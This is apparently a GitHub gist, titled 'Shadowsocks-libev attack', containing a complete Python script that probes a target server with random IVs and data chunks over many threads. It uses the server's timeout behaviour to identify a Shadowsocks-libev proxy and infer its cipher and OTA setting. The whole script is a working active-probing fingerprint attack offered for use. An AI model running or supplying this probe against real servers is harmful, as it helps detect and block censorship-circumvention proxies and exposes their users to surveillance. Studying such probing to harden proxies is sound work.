Created
July 20, 2017 08:07
-
-
Save jimages/c1d3f7a8b2e31fa65728056ff9b2d4e1 to your computer and use it in GitHub Desktop.
Shadowsocks-libev attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
#-*- coding: utf-8 -*- | |
''' | |
Copyleft (c) 2016 breakwa11 | |
https://github.com/breakwa11/shadowsocks-rss | |
''' | |
import logging | |
import socket | |
import time | |
import traceback | |
import os | |
import struct | |
import threading | |
import binascii | |
scan_first_try = 8 | |
scan_max_try = 64 | |
max_thread_num = 16 | |
def compat_ord(s): | |
if type(s) == int: | |
return s | |
return _ord(s) | |
def compat_chr(d): | |
if bytes == str: | |
return _chr(d) | |
return bytes([d]) | |
_ord = ord | |
_chr = chr | |
ord = compat_ord | |
chr = compat_chr | |
def to_bytes(s): | |
if bytes != str: | |
if type(s) == str: | |
return s.encode('utf-8') | |
return s | |
def to_str(s): | |
if bytes != str: | |
if type(s) == bytes: | |
return s.decode('utf-8') | |
return s | |
def random_string(length): | |
return os.urandom(length) | |
def test_single(iv, ip, port, addrtype, attack_data_list, connect_timeout = 5, timeout = 2): | |
try: | |
addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM, socket.SOL_TCP) | |
af, socktype, proto, canonname, sa = addrs[0] | |
s = socket.socket(af, socket.SOCK_STREAM) | |
s.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1) | |
s.settimeout(connect_timeout) | |
s.connect(sa) | |
s.send(iv) | |
ok = 0 | |
index = 0 | |
s.settimeout(timeout) | |
while ok == index and index < len(attack_data_list): | |
s.send(attack_data_list[index]) | |
index += 1 | |
try: | |
ret = s.recv(1024) | |
except socket.timeout: | |
ok += 1 | |
continue | |
except: | |
pass | |
break | |
return ok | |
except: | |
pass | |
class TestThread(threading.Thread): | |
def __init__(self, lock, semaphore, index, attack_ok_list, params): | |
threading.Thread.__init__(self) | |
self.lock = lock | |
self.semaphore = semaphore | |
self.index = index | |
self.params = params | |
self.attack_ok_list = attack_ok_list | |
semaphore.acquire() | |
def run(self): | |
for retry in range(3): | |
ok = test_single(*self.params) | |
if ok is None: | |
continue | |
if ok: | |
self.lock.acquire() | |
self.attack_ok_list.append([self.index, ok, self.params[0], self.params[3], self.params[4]]) | |
self.lock.release() | |
break | |
self.semaphore.release() | |
def scan(addr, port): | |
attack_ok_list = [] | |
addrtype = 0 | |
attack_fail = False | |
ota = False | |
lock = threading.Lock() | |
semaphore = threading.Semaphore(max_thread_num) | |
for index in range(scan_first_try): | |
attack_data_list = [] | |
attack_data_list.append(random_string(2)) | |
attack_data_list.append(random_string(1)) | |
attack_data_list.append(random_string(4)) | |
attack_data_list.append(random_string(4)) | |
iv = random_string(8) | |
testThread = TestThread(lock, semaphore, index, attack_ok_list, (iv, addr, port, addrtype, attack_data_list)) | |
testThread.start() | |
print("Waiting response") | |
for thread_num in range(max_thread_num): | |
semaphore.acquire() | |
print("attack size %d" % (len(attack_ok_list),)) | |
if len(attack_ok_list) == 0: | |
return False | |
min_index = 10 | |
for attack_item in attack_ok_list: | |
if attack_item[1] < min_index: | |
min_index = attack_item[1] | |
print("min_index %d" % (min_index,)) | |
if min_index == 4: | |
ota = True | |
attack_ok_list = [] | |
semaphore = threading.Semaphore(max_thread_num) | |
for index in range(scan_first_try): | |
attack_data_list = [] | |
attack_data_list.append(random_string(12)) | |
attack_data_list.append(random_string(1)) | |
attack_data_list.append(random_string(4)) | |
attack_data_list.append(random_string(4)) | |
iv = random_string(8) | |
testThread = TestThread(lock, semaphore, index, attack_ok_list, (iv, addr, port, addrtype, attack_data_list)) | |
testThread.start() | |
print("Waiting response") | |
for thread_num in range(max_thread_num): | |
semaphore.acquire() | |
print("attack size %d" % (len(attack_ok_list),)) | |
if len(attack_ok_list) == 0: | |
return False | |
min_index = 10 | |
for attack_item in attack_ok_list: | |
if attack_item[1] < min_index: | |
min_index = attack_item[1] | |
print("OTA min_index %d" % (min_index,)) | |
if min_index == 4: | |
return False | |
iv_size = 4 + min_index * 4 | |
encryptor_info = {} | |
encryptor_info[16] = 'rc4-md5/aes' | |
encryptor_info[8] = 'chacha20/salsa20' | |
encryptor_info[12] = 'chacha20-ietf' | |
for attack_item in attack_ok_list: | |
if attack_item[1] == min_index: | |
iv = attack_item[2] | |
att_data = b''.join(attack_item[4]) | |
ok = test_single(iv, addr, port, 0, [att_data[:iv_size - len(iv) + 2]]) | |
if ok == 0: | |
print("%s:%d is a Shadowsocks-libev server with %s encryptor, OTA = %s" % (addr, port, encryptor_info[iv_size], ota)) | |
return True | |
return False | |
def main(addr, port): | |
if scan(addr, port): | |
return | |
print("%s:%d is an unknown server" % (addr, port)) | |
if __name__ == '__main__': | |
addr = "127.0.0.1" # set the server ip or hostname | |
port = 8988 # set the server port | |
main(addr, port) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment